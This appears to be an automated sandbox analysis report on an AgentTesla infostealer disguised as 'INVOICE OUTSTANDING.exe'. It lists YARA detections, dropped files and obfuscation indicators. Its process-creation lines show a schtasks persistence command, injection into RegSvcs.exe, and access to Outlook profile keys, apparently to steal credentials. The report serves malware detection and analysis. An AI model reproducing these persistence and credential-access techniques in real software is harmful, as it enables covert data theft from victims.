            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e Author: unknown
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: INVOICE OUTSTANDING.exe
            .NET source code contains very large array initializations
            Source: 14.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB0E6175Au002d5157u002d4EA6u002d8358u002dF3F5E689E6E9u007d/CD42D637u002dB157u002d4DF1u002d910Bu002d590510BF5A22.csLarge array initialization: .cctor: array initializer size 11496
            .NET source code contains very large strings
            Source: INVOICE OUTSTANDING.exe, AddCompanyForm.csLong String: Length: 20037
            Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.csLong String: Length: 20037
            Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.csLong String: Length: 20037
            Source: INVOICE OUTSTANDING.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 14.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0.2.INVOICE OUTSTANDING.exe.47151a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: 0000000E.00000000.319592241.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_e577e17e reference_sample = ed43ddb536e6c3f8513213cd6eb2e890b73e26d5543c0ba1deb2690b5c0385b6, os = windows, severity = x86, creation_date = 2022-03-11, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = 009cb27295a1aa0dde84d29ee49b8fa2e7a6cec75eccb7534fec3f5c89395a9d, id = e577e17e-5c42-4431-8c2d-0c1153128226, last_modified = 2022-04-12
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
            Source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: Process Memory Space: RegSvcs.exe PID: 5364, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_014BE810
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_014BE820
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_014BBF54
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B9628
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B3E70
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B2D00
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B5478
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B63A8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BD3F0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B86AB
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B86B0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B9627
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BDD90
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B3DE2
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B4518
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8480
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8490
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BC4D8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B44D8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B4450
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B546B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8B00
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8B10
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BCB20
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BE360
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B62B5
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BDAD8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B72E9
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B72F8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B625B
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8938
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B8948
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078BD8B8
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_08320040
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083220B9
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_08320006
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083221DF
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_0832026A
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_083202AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169EFB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169FBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01696080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0169F300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6C080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C66328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C63330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C641D1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D14228
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D14F88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D12D68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D116C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D98AD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9B680
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D90AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9C6A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D92F68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D95D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D98AC7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9C63C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D96BC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D96D08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D9B530
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.343081991.00000000046AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.340774998.0000000003E19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.333821911.0000000002E11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.350083466.00000000077D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000003.295352536.00000000035D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000000.253277318.0000000000B00000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexbHwaYRFftTggpxGZzIM.exe4 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.344196351.000000000479C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exeBinary or memory string: OriginalFilenamektXC.exe6 vs INVOICE OUTSTANDING.exe
            Source: INVOICE OUTSTANDING.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: ahgeNfsrA.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe 43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
            Source: INVOICE OUTSTANDING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: ahgeNfsrA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: INVOICE OUTSTANDING.exeReversingLabs: Detection: 37%
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile read: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeJump to behavior
            Source: INVOICE OUTSTANDING.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe "C:\Users\user\Desktop\INVOICE OUTSTANDING.exe"
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe "C:\Users\user\AppData\Roaming\kECjS\kECjS.exe"
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile created: C:\Users\user\AppData\Local\Temp\tmp69D2.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: INVOICE OUTSTANDING.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMutant created: \Sessions\1\BaseNamedObjects\RcVQRTaRQnykjShrHjGChRlqXGx
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:504:120:WilError_01
            Source: INVOICE OUTSTANDING.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
            Source: INVOICE OUTSTANDING.exeString found in binary or memory: Address:/AddressToolStripTextBox-AddressToolStripButton'ToolStripSeparator3'PhoneToolStripLabel
            Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 14.0.RegSvcs.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: INVOICE OUTSTANDING.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: INVOICE OUTSTANDING.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.551379171.00000000067DD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000003.378901648.00000000067E7000.00000004.00000800.00020000.00000000.sdmp, kECjS.exe, 00000012.00000000.364973573.0000000000992000.00000002.00000001.01000000.0000000C.sdmp, kECjS.exe.14.dr

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: INVOICE OUTSTANDING.exe, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: ahgeNfsrA.exe.0.dr, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: 0.0.INVOICE OUTSTANDING.exe.a30000.0.unpack, AddCompanyForm.cs.Net Code: NewLateBinding.LateCall(dax, null, "Invoke", stackVariable4, null, null, stackVariable13, true)
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B5E81 push edi; retf
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_078B5E86 push edi; retf
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeCode function: 0_2_08324FD5 push dword ptr [edx+ebp*2-75h]; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C617E9 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61789 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6177F push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C63330 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C618CB push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C618AF push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C618B3 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C60040 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61867 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61863 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6187F push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61817 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6181B push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61833 push es; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C62177 push edi; retn 0000h
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114F3 push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114FB push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114FF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114EF push es; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114B3 push es; retf
